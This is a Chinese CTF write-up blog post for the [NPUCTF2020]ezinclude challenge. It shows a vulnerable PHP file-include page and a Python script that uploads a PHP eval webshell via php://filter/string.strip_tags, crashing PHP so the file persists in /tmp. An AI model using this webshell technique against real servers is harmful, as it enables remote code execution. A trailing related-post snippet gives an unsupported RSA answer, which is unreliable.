[NPUCTF2020]ezinclude

最新推荐文章于 2024-02-25 15:43:33 发布
最新推荐文章于 2024-02-25 15:43:33 发布
阅读量465 收藏
点赞数
分类专栏: # ctf做题记录 文件读取 RCE 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/115904006
版权

直接读源码
在这里插入图片描述
抓包
在这里插入图片描述
直接传递hash值
?pass=fa25e54758d5d5c1927781a6ede89f8a
看到响应中多了内容
在这里插入图片描述
访问后看到是文件包含
在这里插入图片描述
用伪协议读flflflflag.php

<html>
<head>
<script language="javascript" type="text/javascript">
           window.location.href="404.html";
</script>
<title>this_is_not_fl4g_and_出题人_wants_girlfriend</title>
</head>
<>
<body>
<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){
	die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
?>
</body>
</html>

用伪协议读了其他文件也没找到flag,有点没思路,参考wp。
看wp,可以利用php://filter/string.strip_tags导致php崩溃,同时可上传文件保存在/tmp目录来上传木马.
解析
用python脚本上传文件并写入一句话

import requests
url ="http://7b1ba541-12aa-46b8-ad49-303ade55342d.node3.buuoj.cn/flflflflag.php?" \
     "file=php://filter/string.strip_tags/resource=/etc/passwd"
payload = b"<?php @eval($_POST['pass']);?>"

file = [('file',("hack.jpg",payload,"image/jpeg"))]
res = requests.post(url=url,files=file)
print(res.text)

成功后要爆破文件名,但这题有dir.php
在这里插入图片描述

用file读取我们上传的文件,找到flag
在这里插入图片描述

在这里插入图片描述

fmyyy1
关注
专栏目录
--------已搬运--------[NPUCTF2020]ezinclude - 文件包含 --- php7 漏洞 --。string.strip_tags SegmentFault
Zero_Adam的博客
03-27 755
目录:一、自己做:二、不足:三、 学习WP:新知识!!!string.strip_tags 一、自己做: 0入门,,连接:https://buuoj.cn/challenges#[NPUCTF2020]ezinclude 二、不足: 看到刚开始的提示就蒙了,没有想到传参这么简单 看到了include,文件包含的漏洞,第一时间没有想到用php的伪协议去读取文件,,,除了filter等等,zip也可以上传木马的呀,这个别忘了,,, 三、 学习WP: 看到这个, 像md5拓展攻击,然后抓包看一下, 一看,
flash涂鸦板
12-10
简单易操作 一木了然 而且能让你快速体验到FLASH的操作乐趣 让你有想去学的冲动 而且能让你快速掌握简单操作
-------已搬运------session.upload_progress。伪造session 反序列化 + 文件包含,,临时文件包含 ++ PHP7 的 segment fault
Zero_Adam的博客
05-01 736
目录:1. 在session反序列化,PHP解析器的考点中使用。2. 进行文件包含:!!!我发现了一个新的方法: 1. 在session反序列化,PHP解析器的考点中使用。 PHP反序列化之SEESSION反序列化(二):切入学习点:jarvis OJ PHPINFO. 这个是利用了当session.upload_progress.enabled开启时如果我们上传了一个和session.upload_progress.name同名的变量,也就是名字为PHP_SESSION_UPLOAD_PROGRESS的时
[NPUCTF2020]ezinclude 1
weixin_46196627的博客
02-09 364
大致意思是:使用伪协议php://filter中的string.strip_stags 过滤器 并上传文件 php的垃圾回收机制就不会继续执行 使post传递的文件存储在/temp/文件下。name=1&pass=cookie值 抓包发现 flflflag.php文件。得到$_get[‘file’] include 使用php://filter 对代码读取。php7.0.0-7.1.2可以利用。php7.1.3-7.2.1可以利用。php7.2.2-7.2.8可以利用。源代码get参数进行文件包含。
[NPUCTF2020]ezinclude ---不会编程的崽
最新发布
不会编程的崽的博客
02-25 796
php://filter/string.strip_tags导致php崩溃清空堆栈重启
[NPUCTF2020]ezinclude 文件包含两大 getshell方式
m0_64180167的博客
10-11 1062
说一下我的思路吧robots没有扫描发现存在 dir.php然后404.html 报错这个又正好存在漏洞 所以前面全去看这个了结果根本不是这样做。。。正确的思路是这样发现变量 认为是 name和 pass传递参数或者通过爆破 但是太慢了我们可以抓包测试发现了 hash 因为提示我们MD5 所以我们需要注意然后我们传递一个?name=2发现hash变了 这里我们就多半能确定 cookie是我们的pass因为 name改变 cookie也改变 然后都是hash值。
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
07-16
根据提示,在代码注释中可以找到隐藏的 `e` 值。以下是给定代码的修改版本,以显示隐藏的 `e` 值: ```python from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) # Hidden e = 65537 q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值